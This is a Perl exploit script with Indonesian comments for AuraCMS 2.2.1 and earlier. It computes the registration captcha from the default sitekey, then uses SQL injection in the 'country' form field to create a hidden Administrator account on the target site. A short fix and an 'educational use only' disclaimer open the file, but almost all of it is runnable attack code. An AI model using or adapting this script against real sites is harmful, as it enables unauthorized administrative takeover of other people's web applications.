# baru ini namanya p0rn0c0d3...,
# satu sesi register 2 user yang di buat, pertama user yang sesuai isian form, yang kedua adalah User dengan Administrator hasil keNAKALan User :D
# terima kasih untuk author http://www.milw0rm.com/papers/149
#
# => Perbaikan Sederhana
# 1. Security Code
# Ganti dengan Captcha yang berdasarkan session, dan cari Captcha yang tidak mudah dibaca OCR
# 2. Add Administrator
# Ganti Kode baris 71. pada berkas "user.php" dengan ;
# ---//---
# 71. if (!$country || preg_match("/[^a-zA-Z]/", $country)) $error .= "Error: Formulir Negara belum diisi , silahkan ulangi.<br />";
# ---//---
#
# => Perhatian!
# "Exploit ini dibuat untuk pembelajaran, pengetesan dan pembuktian dari apa yang kami pelajari"
# Segala penyalahgunaan dan kerusakan yang diakibat dari exploit ini bukan tanggung jawab kami
#
# =>Newhack Technology, OpenSource & Security
# ~ NTOS-Team->[fl3xu5,opt1lc] ~
#
use Digest::MD5 qw(md5_hex);
use LWP::UserAgent;
use Getopt::Long;
no warnings;

if(!$ARGV[1]) {
print "\n |--------------------------------------------------|";
print "\n | Indonesian Newhack Technology |";
print "\n |--------------------------------------------------|";
print "\n | AuraCMS <= 2.2.1 (user.php) |";
print "\n | 1.Security Code Bypass |";
print "\n | 2.Add Administrator |";
print "\n | Coded by NTOS-Team |";
print "\n |--------------------------------------------------|";
print "\n | exploit berhasil jika magic_quotes_gpc = off";
print "\n[!] Penggunaan : ";
print "\n[>] perl auracms-user.pl [Site] [Path] ";
print "\n ";
print "\n[!] Contoh : ";
print "\n[>] perl auracms-user.pl localhost /auracms2x/";
print "\n ";
print "\n";
exit;
}
$host = $ARGV[0];
$path = $ARGV[1];
$injek = "Indonesia'),('t4mugel4p', 'gelap\@banget.gitu', '213aa1379cce2862538be1c046319684','Administrator' ,'aktif', 'DuniaGelap";
@namabulan = qw(January February March April May June July August September October November December);
$sitekey = "x1a1MhphAur4kea7V3Rs820dweOwxIw4n3UgSusyM4nt04"; #defaul sitekey dari config.php
$tgl = (localtime)[3];
$bln = (localtime)[4];
$bulan = $namabulan[$bln];
$date = "$bulan $tgl";

## Breaking Security Code Auracms 2.x
$browser = LWP::UserAgent->new() or die();
$getgfx = $browser -> get("http://".$host.$path."?pilih=user&aksi=register",);
$get = $getgfx -> content;
if ($get =~ /random_num" value="(.*?)"><\/td>/) {
$randnum = $1;
}
$gfx = substr(hex(md5_hex($date.$randnum.$sitekey)), 2, 6);

## Proses Add Administrator
$browser = LWP::UserAgent->new() or die();
$postingkomen = $browser -> post(
"http://".$host.$path."?pilih=user&aksi=register",
[
"nama"=>"t1pu4n",
"email"=>"k3tipu\@nie.yea",
"password"=>"terimakasih",
"rpassword"=>"terimakasih",
"country"=>$injek,
"gfx_check"=>$gfx,
"random_num"=>$randnum,
"cekperaturan"=>"1",
"submit"=>"Submit",
],
);
$komen = $postingkomen -> content;
if ($komen =~ />Please Login With Your Username and Your Password</) {
print "[+]Sukses Register User\n";
print "[+]Silahkan dicoba login\n";
print "[+]Username : t4mugel4p\n";
print "[+]Password : t4mugel4p\n";
exit();}
if ($komen =~ />Error/) {
print "[!]Terjadi Kesalahan Pada Proses Register\n";
exit();}
print $komen;
print "[!]\n Exploit Gagal!!! ;)\n";

© NTOS-Team